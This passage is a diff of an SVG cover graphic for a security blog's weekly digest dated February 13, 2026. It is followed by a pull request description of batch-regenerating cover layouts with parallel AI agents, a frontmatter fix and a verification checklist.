12h2v1h-2zM19 12h1v1h-1zM22 12h1v1h-1zM25 12h1v1h-1zM29 12h3v1h-3zM35 12h1v1h-1zM37 12h2v1h-2zM0 13h4v1h-4zM5 13h1v1h-1zM10 13h1v1h-1zM12 13h4v1h-4zM21 13h1v1h-1zM23 13h1v1h-1zM25 13h3v1h-3zM30 13h1v1h-1zM33 13h2v1h-2zM37 13h1v1h-1zM39 13h2v1h-2zM1 14h3v1h-3zM6 14h4v1h-4zM12 14h1v1h-1zM17 14h2v1h-2zM21 14h1v1h-1zM24 14h2v1h-2zM28 14h2v1h-2zM31 14h2v1h-2zM34 14h3v1h-3zM38 14h3v1h-3zM1 15h5v1h-5zM7 15h1v1h-1zM9 15h2v1h-2zM13 15h4v1h-4zM19 15h4v1h-4zM24 15h1v1h-1zM26 15h3v1h-3zM31 15h2v1h-2zM34 15h1v1h-1zM36 15h2v1h-2zM0 16h1v1h-1zM2 16h5v1h-5zM9 16h3v1h-3zM14 16h1v1h-1zM16 16h5v1h-5zM22 16h4v1h-4zM30 16h3v1h-3zM36 16h2v1h-2zM39 16h1v1h-1zM0 17h3v1h-3zM5 17h1v1h-1zM7 17h2v1h-2zM11 17h4v1h-4zM17 17h4v1h-4zM22 17h3v1h-3zM32 17h2v1h-2zM35 17h1v1h-1zM37 17h1v1h-1zM1 18h1v1h-1zM3 18h1v1h-1zM5 18h2v1h-2zM11 18h1v1h-1zM13 18h5v1h-5zM20 18h2v1h-2zM25 18h5v1h-5zM32 18h1v1h-1zM36 18h1v1h-1zM38 18h2v1h-2zM1 19h2v1h-2zM4 19h1v1h-1zM7 19h1v1h-1zM14 19h1v1h-1zM16 19h1v1h-1zM19 19h1v1h-1zM22 19h1v1h-1zM25 19h6v1h-6zM35 19h1v1h-1zM37 19h3v1h-3zM1 20h1v1h-1zM6 20h3v1h-3zM11 20h1v1h-1zM13 20h2v1h-2zM18 20h1v1h-1zM20 20h1v1h-1zM22 20h1v1h-1zM25 20h3v1h-3zM29 20h6v1h-6zM36 20h4v1h-4zM0 21h1v1h-1zM2 21h1v1h-1zM4 21h2v1h-2zM7 21h1v1h-1zM10 21h4v1h-4zM16 21h1v1h-1zM18 21h1v1h-1zM20 21h5v1h-5zM30 21h2v1h-2zM34 21h3v1h-3zM39 21h2v1h-2zM0 22h1v1h-1zM3 22h6v1h-6zM12 22h1v1h-1zM14 22h3v1h-3zM20 22h1v1h-1zM23 22h2v1h-2zM28 22h3v1h-3zM33 22h5v1h-5zM39 22h1v1h-1zM3 23h1v1h-1zM14 23h1v1h-1zM18 23h2v1h-2zM23 23h1v1h-1zM25 23h1v1h-1zM27 23h1v1h-1zM30 23h1v1h-1zM32 23h2v1h-2zM3 24h1v1h-1zM6 24h2v1h-2zM10 24h2v1h-2zM14 24h4v1h-4zM19 24h1v1h-1zM22 24h1v1h-1zM24 24h3v1h-3zM29 24h1v1h-1zM31 24h1v1h-1zM35 24h1v1h-1zM37 24h2v1h-2zM40 24h1v1h-1zM0 25h5v1h-5zM7 25h2v1h-2zM11 25h5v1h-5zM17 25h1v1h-1zM19 25h1v1h-1zM24 25h2v1h-2zM27 25h1v1h-1zM29 25h1v1h-1zM31 25h3v1h-3zM37 25h2v1h-2zM40 25h1v1h-1zM3 26h5v1h-5zM9 26h3v1h-3zM14 26h1v1h-1zM16 26h1v1h-1zM18 26h3v1h-3zM24 26h1v1h-1zM26 26h1v1h-1zM28 26h2v1h-2zM31 26h4v1h-4zM37 26h1v1h-1zM39 26h2v1h-2zM0 27h2v1h-2zM5 27h1v1h-1zM10 27h6v1h-6zM19 27h5v1h-5zM26 27h2v1h-2zM30 27h4v1h-4zM35 27h3v1h-3zM40 27h1v1h-1zM2 28h1v1h-1zM4 28h1v1h-1zM6 28h2v1h-2zM9 28h2v1h-2zM15 28h1v1h-1zM18 28h2v1h-2zM21 28h2v1h-2zM25 28h4v1h-4zM31 28h1v1h-1zM33 28h1v1h-1zM36 28h2v1h-2zM2 29h1v1h-1zM7 29h4v1h-4zM14 29h1v1h-1zM17 29h1v1h-1zM19 29h1v1h-1zM22 29h1v1h-1zM24 29h4v1h-4zM29 29h5v1h-5zM35 29h1v1h-1zM37 29h1v1h-1zM39 29h1v1h-1zM0 30h1v1h-1zM2 30h2v1h-2zM5 30h3v1h-3zM11 30h2v1h-2zM16 30h2v1h-2zM20 30h2v1h-2zM23 30h5v1h-5zM32 30h4v1h-4zM3 31h3v1h-3zM7 31h1v1h-1zM9 31h2v1h-2zM14 31h2v1h-2zM17 31h2v1h-2zM20 31h1v1h-1zM22 31h1v1h-1zM24 31h1v1h-1zM27 31h3v1h-3zM32 31h1v1h-1zM34 31h1v1h-1zM36 31h5v1h-5zM1 32h2v1h-2zM4 32h1v1h-1zM6 32h1v1h-1zM9 32h2v1h-2zM12 32h1v1h-1zM15 32h1v1h-1zM18 32h3v1h-3zM23 32h2v1h-2zM26 32h2v1h-2zM29 32h2v1h-2zM32 32h7v1h-7zM40 32h1v1h-1zM8 33h2v1h-2zM14 33h1v1h-1zM16 33h1v1h-1zM20 33h1v1h-1zM23 33h1v1h-1zM27 33h2v1h-2zM32 33h1v1h-1zM36 33h1v1h-1zM38 33h3v1h-3zM0 34h7v1h-7zM8 34h3v1h-3zM12 34h3v1h-3zM16 34h2v1h-2zM21 34h4v1h-4zM26 34h1v1h-1zM28 34h5v1h-5zM34 34h1v1h-1zM36 34h4v1h-4zM0 35h1v1h-1zM6 35h1v1h-1zM8 35h2v1h-2zM11 35h3v1h-3zM18 35h2v1h-2zM21 35h2v1h-2zM24 35h3v1h-3zM28 35h1v1h-1zM30 35h1v1h-1zM32 35h1v1h-1zM36 35h1v1h-1zM39 35h1v1h-1zM0 36h1v1h-1zM2 36h3v1h-3zM6 36h1v1h-1zM9 36h1v1h-1zM11 36h2v1h-2zM15 36h1v1h-1zM18 36h2v1h-2zM21 36h2v1h-2zM29 36h1v1h-1zM32 36h7v1h-7zM40 36h1v1h-1zM0 37h1v1h-1zM2 37h3v1h-3zM6 37h1v1h-1zM8 37h2v1h-2zM16 37h1v1h-1zM18 37h2v1h-2zM27 37h1v1h-1zM29 37h1v1h-1zM31 37h1v1h-1zM36 37h4v1h-4zM0 38h1v1h-1zM2 38h3v1h-3zM6 38h1v1h-1zM8 38h2v1h-2zM14 38h2v1h-2zM17 38h5v1h-5zM24 38h1v1h-1zM26 38h1v1h-1zM28 38h2v1h-2zM35 38h1v1h-1zM39 38h2v1h-2zM0 39h1v1h-1zM6 39h1v1h-1zM12 39h5v1h-5zM18 39h2v1h-2zM21 39h2v1h-2zM24 39h1v1h-1zM26 39h1v1h-1zM28 39h1v1h-1zM32 39h2v1h-2zM36 39h2v1h-2zM39 39h1v1h-1zM0 40h7v1h-7zM8 40h4v1h-4zM13 40h1v1h-1zM15 40h3v1h-3zM20 40h4v1h-4zM25 40h1v1h-1zM30 40h1v1h-1zM32 40h3v1h-3zM37 40h1v1h-1zM39 40h1v1h-1z"/>
   </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 13, 2026</text>
-
-  <!-- Card 1: LAZARUS -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <ellipse cx="0" cy="-4" rx="14" ry="9" fill="none" stroke="#ef4444" stroke-width="1.8"/><circle cx="0" cy="-4" r="4" fill="#ef4444" opacity="0.7"/>
-  </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">LAZARUS</text>
-  <!-- Card 2: SEC OPS -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <!-- Card 3: CLOUD SEC -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8" transform="scale(0.65)"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 4: THREAT INT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <!-- Card 5: AI AGENT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22d3ee" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22d3ee" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22d3ee" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22d3ee" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22d3ee" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22d3ee" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">AI AGENT</text>
-
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
-
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
-  </g>
-  <!-- Node: LAZARUS -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">LAZAR</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">THRE</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">AI</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
-
-  <!-- Tags -->
-  <rect x="32" y="490" width="83" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="73" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">LAZARUS</text>
-  <rect x="127" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="168" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <rect x="222" y="490" width="101" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="272" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <rect x="335" y="490" width="110" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="390" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <rect x="457" y="490" width="92" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="503" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">AI AGENT</text>
-
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 13, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>


### PR DESCRIPTION
## Summary

Batch 1 of 3 — scales the pilot (PR #298) validated pattern to 17 pre-April covers across Jan 23 - Feb 13.

## Layout distribution (quota achieved)

| Layout | Count | Dates |
|--------|-------|-------|
| L13 Callouts | 3 | 01-24, 01-30, 02-08 |
| L14 Timeline | 4 | 01-27, 01-31, 02-06, 02-12 |
| L20 Hero+2-Card | 3 | 01-28, 02-04, 02-11 |
| L21 Metro Map | 4 | 01-25, 02-01, 02-07, 02-13 |
| L22 Stacked Bands | 3 | 01-23, 01-29, 02-05 |

**Adjacency**: no two adjacent dates share same layout; minimum same-layout gap = 4 days (01-27 L14 → 01-31 L14).

## Frontmatter fix

5 posts (01-23/24/25/26/27) had `image:` pointing to OLD short-filename SVGs from the pre-April generator era (`2026-01-23-Tech_Security_Weekly_Digest.svg`). Updated to match the repo convention (full slug matching post filename). The orphaned short-filename SVGs remain in the repo for now (separate cleanup opportunity).

Note: 01-26 was the L14 Timeline pilot from PR #298. The pilot wrote the new SVG but didn't update the frontmatter, so production still displayed the OLD cover. This PR fixes that.

## Verification

- [x] xmllint: 17/17 pass
- [x] check_posts.py: zero density/truncated warnings
- [x] HQ marker line 2/3 present (17/17)
- [x] QR embedded (17/17)
- [x] English-only text (no Korean)
- [x] File sizes 25-37 KB (within 18-50 KB gate)
- [x] Layout compliance 17/17 (prompt-level lock verified)
- [ ] Visual: home card grid shows diverse layouts
- [ ] QR scan: sample 2-3 covers resolve to correct post URLs

## Execution metrics

- 17 ulw executor agents (sonnet) in parallel
- Wall-clock: ~10 minutes total (2 rounds of parallel dispatch)
- All 17 reported "lock compliance: YES"

## Next

Batch 2 (Feb 14 - Feb 28, ~14 covers) and Batch 3 (Mar 1 - Mar 31 ex 03-10 pilot, ~27 covers) after this merges.